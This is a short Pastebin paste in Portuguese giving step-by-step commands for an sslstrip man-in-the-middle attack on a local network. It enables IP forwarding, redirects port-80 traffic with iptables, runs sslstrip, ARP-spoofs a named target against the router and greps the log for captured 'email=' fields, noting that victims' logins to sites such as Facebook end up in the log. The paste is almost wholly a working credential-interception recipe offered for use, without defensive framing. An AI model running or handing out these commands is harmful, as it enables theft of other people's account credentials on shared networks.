Advertisement
syst3m_h4x0r

Sslstrip Explicações

Jun 19th, 2018
24,253
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.00 KB | None | 0 0
  1. echo "1" > /proc/sys/net/ipv4/ip_forward
  2. iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080
  3. sslstrip -a -l 8080
  4. arpspoof -i eth0 -t 192.168.0.25 192.168.0.1(ip do roteador)
  5. tail -f sslstrip.log | grep "email="
  6.  
  7.  
  8.  
  9.  
  10.  
  11.  
  12.  
  13.  
  14. #echo
  15. Ativar o repasse de pacotes
  16.  
  17. #iptables
  18. Criar um redirecionamento de conexões no IPTABLES
  19.  
  20. #sslstrip
  21. Pro ataque podemos usar o básico, a opção -a e -l
  22. como definimos a porta 8080 no começo, é esta que vamos usar
  23.  
  24. Porem como não somos o gateway da rede, precisamos forçar o trafego a passar por nós, uma das formas mais comuns é o ARP SPOOF
  25. Alvo = 192.168.0.25
  26. Atacante = 192.168.0.102
  27.  
  28. Após o comando arpspoof até ai tranquilo, agora basta que o alvo acesse algum site HTTPS como facebook e o sslstrip vai logar os dados em sslstrip.log
  29.  
  30. #filtrar a saída em busca de email
  31. tail -f sslstrip.log | grep "email="
  32.  
  33. Caso não queira ficar digitando esses comandos direto você usa esse script https://comax.fr/index.php yamas.sh
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement